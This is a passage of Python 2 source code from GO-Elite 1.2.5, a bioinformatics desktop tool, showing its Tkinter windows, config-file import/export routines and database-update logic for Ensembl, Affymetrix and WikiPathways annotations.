species_names[sd.SpeciesCode()] = sd
return species_names
def exportSpeciesInfo(species_codes):
fn=filepath('Config/species.txt'); data = open(fn,'w'); x=0
header = string.join(['species_code','species_name','tax_id','compatible_algorithms'],'\t')+'\n'
data.write(header)
for species in species_codes:
if 'New Species' not in species and 'all-' not in species and species != '':
sd = species_codes[species]
mods = string.join(sd.Systems(),'|')
values = [sd.SpeciesCode(),sd.SpeciesName(),sd.TaxID(),mods]
values = string.join(values,'\t')+'\n'
data.write(values)
data.close()
def exportArrayVersionInfo(species_array_db):
fn=filepath('Config/array_versions.txt'); data = open(fn,'w'); x=0
print 'Exporting:',fn
for (species,db_version) in species_array_db:
supported_arrays = unique.unique(species_array_db[(species,db_version)])
supported_arrays = string.join(supported_arrays,'|')
values = [species,db_version,supported_arrays]
values = string.join(values,'\t')+'\n'
data.write(values)
data.close()
def exportSpeciesVersionInfo(species_archive_db):
fn=filepath('Config/versions.txt'); data = open(fn,'w'); x=0
print 'Exporting:',fn
for species in species_archive_db:
db_versions = species_archive_db[species]
db_versions = string.join(db_versions,'|')
values = [species,db_versions]
values = string.join(values,'\t')+'\n'
data.write(values)
data.close()
def importOnlineDatabaseVersions():
filename = 'Config/versions.txt'
fn=filepath(filename); global db_versions; db_versions={}
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
try:
species,versions = string.split(data,'\t')
versions = string.split(versions,'|')
for version in versions:
try: db_versions[version].append(species)
except KeyError: db_versions[version] = [species]
except Exception: print [data]
return db_versions
class SystemData:
def __init__(self, syscode, sysname, mod):
self._syscode = syscode; self._sysname = sysname; self._mod = mod
def SystemCode(self): return self._syscode
def SystemName(self): return self._sysname
def MOD(self): return self._mod
def __repr__(self): return self.SystemCode()+'|'+self.SystemName()+'|'+self.MOD()
def importSystemInfo():
filename = 'Config/source_data.txt'; x=0
fn=filepath(filename); mod_list=[]
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if '!DOCTYPE' in data:
fn2 = string.replace(fn,'.txt','_archive.txt')
import shutil; shutil.copyfile(fn2,fn) ### Bad file was downloaded (with warning)
importSystemInfo(); break
else:
try: sysname=t[0];syscode=t[1]
except Exception: sysname=''
try: mod = t[2]
except Exception: mod = ''
if x==0: x=1
elif sysname != '':
system_list.append(sysname)
ad = SystemData(syscode,sysname,mod)
if len(mod)>1: mod_list.append(sysname)
system_codes[sysname] = ad
return system_codes,system_list,mod_list
def remoteSystemInfo():
global system_list; system_list=[]; global system_codes; system_codes={}
system_codes,system_list,mod_list = importSystemInfo()
return system_codes,system_list,mod_list
def exportSystemInfo():
if len(system_codes)>0:
filename = 'Config/source_data.txt'
fn=filepath(filename); data = open(fn,'w')
header = string.join(['System','SystemCode','MOD_status'],'\t')+'\n'
data.write(header)
for sysname in system_codes:
ad = system_codes[sysname]
values = string.join([sysname,ad.SystemCode(),ad.MOD()],'\t')+'\n'
data.write(values)
data.close()
def exportSystemInfoRemote(system_code_db):
global system_codes; system_codes = system_code_db
exportSystemInfo()
class FileLocationData:
def __init__(self, status, location, species):
self._status = status; self._location = location; self._species = species
def Status(self): return self._status
def Location(self): return self._location
def SetLocation(self,location): self._location = location
def Species(self): return self._species
def __repr__(self): return self.Report()
def importDefaultFileLocations():
filename = 'Config/default-files.csv'
fn=filepath(filename); file_location_defaults={}
for line in open(fn,'rU').readlines():
line = string.replace(line,',','\t') ### Make tab-delimited (had to make CSV since Excel would impoperly parse otherwise)
data = cleanUpLine(line)
app,status,location,species = string.split(data,'\t')
fl = FileLocationData(status, location, species)
if species == 'all': file_location_defaults[app] = fl
else:
try: file_location_defaults[app].append(fl)
except KeyError: file_location_defaults[app] = [fl]
return file_location_defaults
def exportDefaultFileLocations(file_location_defaults):
### If the user supplies new defaults, over-write the existing
fn=filepath('Config/default-files.csv'); data = open(fn,'w')
for app in file_location_defaults:
fl_list = file_location_defaults[app]
try:
for fl in fl_list:
values = [app,fl.Status(),fl.Location(),fl.Species()]
values = '"'+string.join(values,'","')+'"'+'\n'
data.write(values)
except Exception:
fl = fl_list
values = [app,fl.Status(),fl.Location(),fl.Species()]
values = '"'+string.join(values,'","')+'"'+'\n'
data.write(values)
data.close()
class OptionData:
def __init__(self,option,displayed_title,display_object,description,analysis_options,defaults):
self._option = option; self._displayed_title = displayed_title; self._description = description
self._analysis_options = analysis_options; self._display_object = display_object; self._defaults = defaults
def Option(self): return self._option
def Display(self): return self._displayed_title
def DisplayObject(self): return self._display_object
def Description(self): return self._description
def AnalysisOptions(self): return self._analysis_options
def DefaultOption(self): return self._defaults
def setAnalysisOptions(self,analysis_options): self._analysis_options = analysis_options
def setDefaultOption(self,defaults): self._defaults = defaults
def __repr__(self): return self.Report()
def importUserOptions(type):
filename = 'Config/options.txt'; option_db={}; option_group_db={}
fn=filepath(filename); x=0
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
data = string.replace(data,'\k','\n') ###Used \k in the file instead of \n, since these are removed above
t = string.split(data,'\t')
option,displayed_title,display_object,group,description,analysis_options,defaults = t
if x == 0:
x = 1
else:
analysis_options = string.split(analysis_options,'|')
od = OptionData(option,displayed_title,display_object,description,analysis_options,defaults)
option_db[option] = od
#option_list.append(option)
try: option_group_db[group].append(option)
except KeyError: option_group_db[group] = [option]
return option_group_db,option_db
class IndicatorWindow:
def __init__(self,message,button_text):
self.message = message; self.button_text = button_text
parent = Tk(); self._parent = parent; nulls = '\t\t\t\t\t\t\t'; parent.title('Attention!!!')
filename = 'Config/warning_big.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(parent); can.pack(side='left',padx = 10); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
Label(parent, text='\n'+self.message+'\n'+nulls).pack()
quit_button = Button(parent, text='Quit', command=self.quit); quit_button.pack(side = 'bottom', padx = 5, pady = 5)
text_button = Button(parent, text=self.button_text, command=parent.destroy); text_button.pack(side = 'bottom', padx = 5, pady = 5)
parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
parent.mainloop()
def quit(self): self._parent.quit(); self._parent.destroy(); sys.exit()
def deleteWindow(self):
tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
class FeedbackWindow:
def __init__(self,message,button_text,button_text2):
self.message = message; self.button_text = button_text; self.button_text2 = button_text2
parent = Tk(); self._parent = parent; nulls = '\t\t\t\t\t\t\t'; parent.title('Attention!!!')
self._user_variables={}
filename = 'Config/warning_big.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(parent); can.pack(side='left',padx = 10); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
Label(parent, text='\n'+self.message+'\n'+nulls).pack()
text_button = Button(parent, text=self.button_text, command=self.button1); text_button.pack(side = 'bottom', padx = 5, pady = 5)
if button_text2 != '':
text_button2 = Button(parent, text=self.button_text2, command=self.button2); text_button2.pack(side = 'bottom', padx = 5, pady = 5)
parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
parent.mainloop()
def button1(self): self._user_variables['button']=self.button_text; self._parent.destroy()
def button2(self): self._user_variables['button']=self.button_text2; self._parent.destroy()
def ButtonSelection(self): return self._user_variables
def deleteWindow(self):
tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
class ProcessCompletedWindow:
def __init__(self,message,button_text):
self.message = message; self.button_text = button_text
parent = Tk(); self._parent = parent; nulls = '\t\t\t\t\t\t\t'; parent.title('Process Completed')
filename = 'Config/icon.gif'; fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(parent); can.pack(side='left',padx = 10); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
Label(parent, text='\n'+self.message+'\n'+nulls).pack()
quit_button = Button(parent, text='Quit', command=self.quit); quit_button.pack(side = 'bottom', padx = 5, pady = 5)
text_button = Button(parent, text=self.button_text, command=parent.destroy); text_button.pack(side = 'bottom', padx = 5, pady = 5)
parent.mainloop()
def quit(self): self._parent.quit(); self._parent.destroy(); sys.exit()
class WarningWindow:
def __init__(self,warning,window_name):
tkMessageBox.showwarning(window_name, warning)
class InfoWindow:
def __init__(self,dialogue,header):
tkMessageBox.showinfo(header, dialogue)
class StringVarFile:
def __init__(self,stringVar,window):
self.__newline = 0; self.__stringvar = stringVar; self.__window = window
def write(self,s):
new = self.__stringvar.get()
for c in s:
#if c == '\n': self.__newline = 1
if c == '\k': self.__newline = 1### This should not be found and thus results in a continous feed rather than replacing a single line
else:
if self.__newline: new = ""; self.__newline = 0
new = new+c
try: self.set(new)
except Exception: None ### Not sure why this occurs
def set(self,s): self.__stringvar.set(s); self.__window.update()
def get(self): return self.__stringvar.get()
class StatusWindow:
def __init__(self,root,analysis,values):
try:
if debug_mode == 'yes':
if analysis == 'getAdditionalOnlineResources':
species_code,additional_resources = values
getAdditionalOnlineResources(species_code,additional_resources,root)
if analysis == 'EntrezGOExport':
tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG = values
exportEntrezGO(tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG,root)
if analysis == 'AffyCSV':
system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version = values
extractAffymetrixCSVAnnotations(system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version.root)
if analysis == 'UpdateOBO':
file_location_defaults,update_OBO,OBO_url = values
updateOBOfiles(file_location_defaults,update_OBO,OBO_url,root)
if analysis == 'getOnlineEliteConfig':
file_location_defaults = values
getOnlineEliteConfig(file_location_defaults,root)
if analysis == 'getOnlineEliteDatabase':
file_location_defaults,db_version,new_species_codes,download_obo,additional_resources = values
getOnlineEliteDatabase(file_location_defaults,db_version,new_species_codes,download_obo,additional_resources,root)
if analysis == 'DownloadEntrezGO':
file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG = values
downloadFiles(file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG,root)
if analysis == 'EnsemblSQLImport':
species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system = values
importEnsemblSQL(species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system,root)
if analysis == 'copy':
file1,file2 = values
copyFiles(file1,file2,root)
if analysis == 'updateRelationshipFiles':
update_relationship_file,relationship_to_update,overwrite_relationships,species_code = values
addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code,root)
if analysis == 'updateAnnotationFiles':
update_annotation_file,annotations_to_update,overwrite_annotations,species_code = values
addNewCustomAnnotations(update_annotation_file,annotations_to_update,overwrite_annotations,species_code,root)
if analysis == 'getCurrentEnsemblSpecies':
getCurrentEnsemblSpecies(root)
if analysis == 'getVersionedEnsExternalDB':
species_full,ensembl_version = values
getVersionedEnsExternalDB(species_full,ensembl_version,root)
else:
self._parent = root
root.title('GO-Elite 1.2.5 - Status Window')
statusVar = StringVar() ### Class method for Tkinter. Description: "Value holder for strings variables."
if os.name == 'nt': width = 575; height = 450
else: width = 650; height = 500
self.sf = PmwFreeze.ScrolledFrame(self._parent,
labelpos = 'n', label_text = 'Results Status Window',
usehullsize = 1, hull_width = width, hull_height = height)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Output')
group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
Label(group.interior(),width=180,height=452,justify=LEFT, bg='black', fg = 'white',anchor=NW,padx = 5,pady = 5, textvariable=statusVar).pack(fill=X,expand=Y)
status = StringVarFile(statusVar,root) ### Captures the stdout (or print) to the GUI instead of to the terminal
original_sys_out = sys.stdout ### Save the original stdout mechanism
sys.stdout = status
if analysis == 'getAdditionalOnlineResources':
species_code,additional_resources = values
root.after(100, getAdditionalOnlineResources(species_code,additional_resources,root))
if analysis == 'EntrezGOExport':
tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG = values
root.after(100, exportEntrezGO(tax_id,species_code,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG,root))
if analysis == 'AffyCSV':
system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version = values
root.after(100, extractAffymetrixCSVAnnotations(system_codes,species_code,species_full,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version,root))
if analysis == 'UpdateOBO':
file_location_defaults,update_OBO,OBO_url = values
root.after(100, updateOBOfiles(file_location_defaults,update_OBO,OBO_url,root))
if analysis == 'getOnlineEliteConfig':
file_location_defaults = values
root.after(100, getOnlineEliteConfig(file_location_defaults,root))
if analysis == 'getOnlineEliteDatabase':
file_location_defaults,db_version,new_species_codes,download_obo,additional_resources = values
root.after(100, getOnlineEliteDatabase(file_location_defaults,db_version,new_species_codes,download_obo,additional_resources,root))
if analysis == 'DownloadEntrezGO':
file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG = values
root.after(100, downloadFiles(file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG,root))
if analysis == 'EnsemblSQLImport':
species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system = values
importEnsemblSQL(species_code,species,child_dirs,externalDBName_list,overwrite_ensembl,rewrite_existing,force,ensembl_version,external_system,root)
if analysis == 'copy':
file1,file2 = values
root.after(100,copyFiles(file1,file2,root))
if analysis == 'updateRelationshipFiles':
update_relationship_file,relationship_to_update,overwrite_relationships,species_code = values
root.after(100,addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code,root))
if analysis == 'updateAnnotationFiles':
update_annotation_file,annotations_to_update,overwrite_annotations,species_code = values
root.after(100,addNewCustomAnnotations(update_annotation_file,annotations_to_update,overwrite_annotations,species_code,root))
if analysis == 'getCurrentEnsemblSpecies':
root.after(100,getCurrentEnsemblSpecies(root))
if analysis == 'getVersionedEnsExternalDB':
species_full,ensembl_version = values
root.after(100,getVersionedEnsExternalDB(species_full,ensembl_version,root))
#self._parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
self._parent.mainloop()
sys.stdout = original_sys_out ### Set this back to not capture print statements to the GUI anymore (if you don't no printing to the terminal)
try: self._parent.destroy()
except Exception: null = []
except Exception,e:
try:
print traceback.format_exc()
print_out = "Unknown error encountered during data processing.\nIf this error occurs again, please report to genmapp@gladstone.ucsf.edu."
try: WarningWindow(print_out,'Error Encountered!'); self._parent.destroy()
except Exception: print print_out
except Exception: sys.exit()
def deleteWindow(self): tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
def quit(self): self._parent.quit(); self._parent.destroy(); sys.exit()
def addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code,root):
try: status = gene_associations.addNewCustomRelationships(update_relationship_file,relationship_to_update,overwrite_relationships,species_code)
except Exception, e: status = e
if status == 'exported':
print_out = "Imported relationships added to: "+relationship_to_update
InfoWindow(print_out,'Process Completed')
else:
print status
print_out = "Unknown file error encountered. Ensure the input file only has two columns."
WarningWindow(print_out,'Error Encountered!')
root.destroy()
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def addNewCustomAnnotations(update_annotation_file,annotations_to_update,overwrite_annotations,species_code,root):
try: status = gene_associations.addNewCustomSystem(update_annotation_file,annotations_to_update,overwrite_annotations,species_code)
except Exception, e: status = e; print e
if status == 'exported':
print_out = "Imported annotations added to "+species_code+' '+annotations_to_update
InfoWindow(print_out,'Process Completed')
else:
print status
print_out = "Unknown file error encountered. Ensure the input file only has three columns."
WarningWindow(print_out,'Error Encountered!')
root.destroy()
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def getCurrentEnsemblSpecies(root):
global child_dirs; global ensembl_species; global ensembl_versions
import EnsemblSQL
try:
print "Getting a list of current Ensembl species...one moment please"
version = 'current'
child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies(version)
ensembl_versions.reverse()
root.destroy()
except Exception:
print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def filterExternalDBs(all_external_ids,externalDBName_list,external_ids,array_db):
filtered_external_list=[]
for name in externalDBName_list:
if name in external_ids:
id = external_ids[name]
if id in all_external_ids:
if name != 'GO': filtered_external_list.append(name)
for array in array_db:
if '\\N_' not in array: filtered_external_list.append(array)
return filtered_external_list
def getVersionedEnsExternalDB(species_full,ensembl_version,root):
try:
import EnsemblSQL
print "Getting a list of current Ensembl external databases...one moment please"
child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies(ensembl_version)
try:
ensembl_sql_dir,ensembl_sql_description_dir = child_dirs[species_full]
### Download the latest version of Ensembl
try:
EnsemblSQL.updateFiles(ensembl_sql_dir,'Config/','external_db.txt','yes')
try: EnsemblSQL.updateFiles(string.replace(ensembl_sql_dir,'core','funcgen'),'Config/','array.txt','yes')
except Exception:
raw = export.ExportFile('Config/array.txt'); raw.close()
print "No array relationships avaiable for",species_full
root.destroy()
except Exception:
print_out = "Ensembl external database file not found."
WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
except Exception:
### species not supported by Ensembl version
print_out = "This species is not available for this version of\nEnsembl. Please try another version.."
WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
except Exception:
print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
WarningWindow(print_out,'Continue'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def copyFiles(file1,file2,root):
print 'Copying file from:\n',file1
print 'To:\n',file2
data = export.ExportFile(file2) ### Ensures the directory exists
shutil.copyfile(file1,file2)
root.destroy()
def TimeStamp():
time_stamp = time.localtime()
year = str(time_stamp[0]); month = str(time_stamp[1]); day = str(time_stamp[2])
if len(month)<2: month = '0'+month
if len(day)<2: day = '0'+day
return year+month+day
def deleteWPFiles():
status = export.deleteFolder('BuildDBs/wikipathways')
os.mkdir(filepath('BuildDBs/wikipathways'))
def extractAffymetrixCSVAnnotations(system_codes,species_codees,species_fulls,incorporate_previous_associations,process_go,parse_genesets,integrate_affy_associations,overwrite_affycsv,get_mapped_file_version,root):
run_parameter = "Create/Modify Databases"
if 'over-write previous' in overwrite_affycsv: overwrite_affycsv = 'over-write previous' ### The config name is longer
if parse_genesets == 'no':
for species_code in species_codees:
print incorporate_previous_associations
BuildAffymetrixAssociations.buildAffymetrixCSVAnnotations(species_code,incorporate_previous_associations,process_go,'no',integrate_affy_associations,overwrite_affycsv)
print_out = 'Finished parsing the latest Affymetrix CSV annotations.'
InfoWindow(print_out,'Update Complete!')
continue_to_next_win = Button(text = 'Continue', command = root.destroy)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
else:
### Coded a little weird, but allows the user to select mapped (Ensembl-inferred) versus non-mapped
relationship_types = ['native','mapped']; ri=0
if get_mapped_file_version == 'yes':
relationship_types = ['mapped','mapped']
### Used when building a flat file from GPML zip file
import gene_associations; all_species = 'no'
try:
gene_associations.convertAllGPML(species_codees,species_fulls) ### Downloads GPMLs and builds flat files
except Exception:
status = 'Unable to connect to http://www.wikipathways.org'
try: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
except Exception: print status; sys.exit()
for relationship_type in relationship_types:
index=0; ri+=1
for species_code in species_codees:
species_full = species_fulls[index]
counts = BuildAffymetrixAssociations.importWikipathways(system_codes,incorporate_previous_associations,process_go,species_full,species_code,integrate_affy_associations,relationship_type,overwrite_affycsv)
index+=1
if counts == 0: print_out = 'No Affymetrix annotation files found, thus results based on existing meta file relationships.'; WarningWindow(print_out,'Update Incomplete!')
else: print_out = 'Finished parsing the latest Wikipathways and Affymetrix annotations.'; InfoWindow(print_out,'Update Complete!')
continue_to_next_win = Button(text = 'Continue', command = root.destroy)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
print_out = 'Finished extracting Affymetrix probeset-gene associations file.'
InfoWindow(print_out,'Update Complete!')
print 'Update Complete!'
continue_to_next_win = Button(text = 'Continue', command = root.destroy)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
class MainMenu:
def __init__(self):
parent = Tk()
self._parent = parent
parent.title('GO-Elite: Introduction')
self._user_variables={}
filename = 'Config/logo.gif'
fn=filepath(filename)
img = PhotoImage(file=fn)
can = Canvas(parent)
can.pack(fill=BOTH)
can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
"""
### Create and pack a horizontal RadioSelect widget.
def buttoncallback(tag,callback=self.callback):
callback(tag)
horiz = PmwFreeze.RadioSelect(parent,
labelpos = 'w', command = buttoncallback,
label_text = 'GO-Elite version 1.2.5 Main', frame_borderwidth = 2,
frame_relief = 'ridge'
); horiz.pack(fill = 'x', padx = 10, pady = 10)
for text in ['Continue']: horiz.add(text)
"""
### Add some buttons to the horizontal RadioSelect
continue_to_next_win = Tkinter.Button(text = 'Begin Analysis', command = parent.destroy)
continue_to_next_win.pack(side = 'bottom', padx = 5, pady = 5);
info_win = Button(self._parent, text="About GO-Elite", command=self.info)
info_win.pack(side = 'bottom', padx = 5, pady = 5)
parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
parent.mainloop()
def info(self):
about = 'GO-Elite version 1.2.5.\n'
about+= 'GO-Elite is an open-source, freely available application covered under the\n'
about+= 'Apache open-source license. Additional information can be found at:\n'
about+= 'http://www.genmapp.org/go_elite\n'
about+= '\nDeveloped by:\n\tNathan Salomonis\n\tBruce Conklin\nGladstone Institutes 2005-2012'
tkMessageBox.showinfo("About GO-Elite",about,parent=self._parent)
def deleteWindow(self):
#tkMessageBox.showwarning("Quit Selected","Use 'Quit' button to end program!",parent=self._parent)
self._parent.destroy(); sys.exit()
def callback(self, tag):
#print 'Button',[option], tag,'was pressed.'
self._user_variables['continue'] = tag
def addOnlineSpeciesDatabases():
root = Tk(); analysis = 'getOnlineEliteConfig'
values = file_location_defaults
StatusWindow(root,analysis,values)
importSystemInfo(); exportSystemInfo() ### By re-importing we incorporate new source data from the downloaded file
existing_species_codes = species_codes
importSpeciesInfo()
try: resource_list = importResourceList()
except Exception: resource_list=['Failed']
if len(species_codes) == 0:
integrate_online_species = 'yes'
importSpeciesInfo() ### Occurs when an unknown error erases the species file
online_species = ['']
for species in species_codes: online_species.append(species)
online_species.sort()
importOnlineDatabaseVersions(); db_version_list=[]
for version in db_versions: db_version_list.append(version)
db_version_list.sort(); db_version_list.reverse(); select_version = db_version_list[0]
db_versions[select_version].sort()
option_db['selected_species1'].setAnalysisOptions(['---']+db_versions[select_version])
option_db['selected_species2'].setAnalysisOptions(['---']+db_versions[select_version])
option_db['selected_species3'].setAnalysisOptions(['---']+db_versions[select_version])
option_db['selected_version'].setAnalysisOptions(db_version_list)
option_db['additional_resources'].setAnalysisOptions(['---']+resource_list)
proceed = 'no'
while proceed == 'no':
root = Tk(); root.title('GO-Elite: Species Databases Available for Download')
gu = GUI(root,option_db,option_group_db['OnlineDatabases'])
db_version = gu.Results()['selected_version']
exportDBversion(db_version)
try: species1 = gu.Results()['selected_species1']
except Exception: species1='---'
try: species2 = gu.Results()['selected_species2']
except Exception: species2='---'
try: species3 = gu.Results()['selected_species3']
except Exception: species3='---'
try: download_obo = gu.Results()['download_obo']
except Exception: download_obo='---'
additional_resources = gu.Results()['additional_resources']
new_species_list = [species1,species2,species3]; new_species_codes={}
for species in new_species_list:
if '---' not in species:
try:
sc = species_codes[species].SpeciesCode();
new_species_codes[sc]=[]
existing_species_codes[species] = species_codes[species]
except Exception: null=[]
if len(new_species_codes) > 0 or download_obo == 'yes':
root = Tk(); analysis = 'getOnlineEliteDatabase'
values = file_location_defaults,db_version,new_species_codes,download_obo,additional_resources
StatusWindow(root,analysis,values)
proceed = 'yes'
else:
print_out = "Please select a species before continuing."
IndicatorWindow(print_out,'Try Again')
exportSpeciesInfo(existing_species_codes)
integrate_online_species = 'no'
def getUserParameters(run_parameter):
global root; global GO_Elite
import GO_Elite
if run_parameter == 'intro':
try: MainMenu()
except Exception:
print_out = "\nCritical error encountered!!! This machine does not have either:\n"
print_out += "1) Have the required Tcl/Tk components installed.\n"
print_out += "2) Is being run from a compiled version that has critical incompatibilities your OS or hardware or\n"
print_out += "3) Is being run from source-code in the same-directory as executable code resulting in a conflict\n"
print_out += "\nIf any of these apply, we recommend downloading the Python source-code version of GO-Elite "
print_out += "(installing necessary dependencies - see our Wiki or Documentation) or should be run from the web version of GO-Elite."
print_out += "Otherwise, please contact GO-Elite support (genmapp@gladstone.ucsf.edu).\n\n"
print_out += "Installation Wiki: http://code.google.com/p/go-elite/wiki/Installation\n\n"
print print_out
try:
### Create a log report of this
try: log_file = filepath('GO-Elite_error-report.log')
except Exception: log_file = filepath('/GO-Elite_error-report.log')
log_report = open(log_file,'w');
log_report.write(print_out)
log_report.write(traceback.format_exc())
log_report.close()
### Open this file
if os.name == 'nt':
try: os.startfile('"'+log_file+'"')
except Exception: os.system('open "'+log_file+'"')
elif 'darwin' in sys.platform: os.system('open "'+log_file+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+log_file+'/"')
except Exception: None
sys.exit()
global species; species=''; global user_variables; user_variables={}; global analysis_method; global array_type
### Get default options for GO-Elite
global run_mappfinder; global ncbi_go_file; global PathDir; global remove_download_files; remove_download_files = 'no'
global system_list; system_list=[]; global system_codes; system_codes={}; global option_db; global option_group_db
global file_location_defaults; global integrate_online_species; integrate_online_species = 'no'; global PathFile
na = 'NA'; log = 'log'; no = 'no';
run_mappfinder=no; mod=na; permutation=0; modifyDBs=no; overwrite_affycsv = na; overwrite_entrezgo = na
incorporate_previous_associations=no; process_go=no; z_threshold=1.96; p_val_threshold=0.05; resources_to_analyze = ''
change_threshold=2; max_member_count = 10000; output_dir = ''; input_dir = ''; denom_dir = ''; custom_sets_dir = ''
ORA_algorithm = no; run_from_scratch = None; returnPathways = None
option_group_db,option_db = importUserOptions('options') ##Initially used to just get the info for species and array_type
import copy
importSpeciesInfo()
if len(species_codes) == 0:
integrate_online_species = 'yes'
importSpeciesInfo() ### Occurs when an unknown error erases the species file
file_location_defaults = importDefaultFileLocations()
ncbi_go_file = file_location_defaults['EntrezGO'].Location()
null,system_list,mod_list = importSystemInfo()
system_code_db = {}
for sysname in system_codes: ad = system_codes[sysname]; system_code_db[ad.SystemCode()]=sysname
species_code_db = {}
for species in species_codes: sd = species_codes[species]; species_code_db[sd.SpeciesCode()]=species
try: PathDir = file_location_defaults['PathDir'].Location()
except Exception: PathDir = ''
try: PathFile = file_location_defaults['PathFile'].Location()
except Exception: PathFile = ''
elite_db_versions=[]
try: elite_db_versions = returnDirectoriesNoReplace('/Databases')
except Exception:
try: elite_db_versions=[];
except Exception: null=[]### directory already exists
try: gene_database_dir = unique.getCurrentGeneDatabaseVersion()
except Exception: gene_database_dir=''
global gu
###Update this informatin in option_db which will be over-written after the user selects a species and array_type
current_species_names = getSpeciesList() ### returns a list of the installed species names (full)
species_list_augmented = copy.deepcopy(current_species_names)
species_list_augmented2 = copy.deepcopy(species_list)
option_db['species'].setAnalysisOptions(current_species_names)
option_db['mod'].setAnalysisOptions(mod_list)
resource_list = importResourceList()
species_list.sort()
if len(elite_db_versions)>1:
option_db['dbase_version'].setAnalysisOptions(elite_db_versions)
option_db['dbase_version'].setDefaultOption(gene_database_dir)
else:
### Otherwise, remove this option
del option_db['dbase_version']; option_group_db['ORA'] = option_group_db['ORA'][1:]
species_list_augmented.sort(); species_list_augmented2.sort()
if len(species_list_augmented2)>0 and species_list_augmented2 != ['']:
species_list_augmented.append('----'); species_list_augmented2.append('----'); species_list_augmented.append('New Species'); species_list_augmented.append('all-supported')
else: species_list_augmented=[]; species_list_augmented2=[]
if len(species_list_augmented)==0: species_list_augmented.append('New Species')
species_list_augmented2.append('New Species')
species_list_augmented.reverse()
option_db['species_resources'].setAnalysisOptions(current_species_names) #species_list_augmented2[:-2]
option_db['species_affy_update'].setAnalysisOptions(species_list_augmented)
option_db['species_eg_update'].setAnalysisOptions(species_list_augmented)
option_db['species_update'].setAnalysisOptions(species_list_augmented2)
if run_parameter[0] == 'ORA': ### Occurs when selecting "Back" from Elite parameter window
old_options = run_parameter[1]
run_mappfinder = 'yes'; run_parameter = 'ORA'
for option in old_options: ### Set options to user selected
option_db[option].setDefaultOption(old_options[option])
try:
if run_parameter == 'skip' or run_parameter == 'intro' or run_parameter == 'ORA':
if run_parameter!= 'ORA':
root = Tk()
root.title('GO-Elite: Main Dataset Parameters')
gu = GUI(root,option_db,option_group_db['parameters'])
run_from_scratch = gu.Results()['run_from_scratch']
if run_from_scratch == 'Analyze ID Lists': run_mappfinder = 'yes'; update_dbs = 'no'
if run_from_scratch == 'Prune Existing Results': run_mappfinder = 'no'; update_dbs = 'no'
if run_from_scratch == 'Update or Add Databases': run_mappfinder = 'no'; update_dbs= 'yes'
if run_from_scratch == 'View Data on Pathways': run_mappfinder = 'NA'; update_dbs = 'NA'
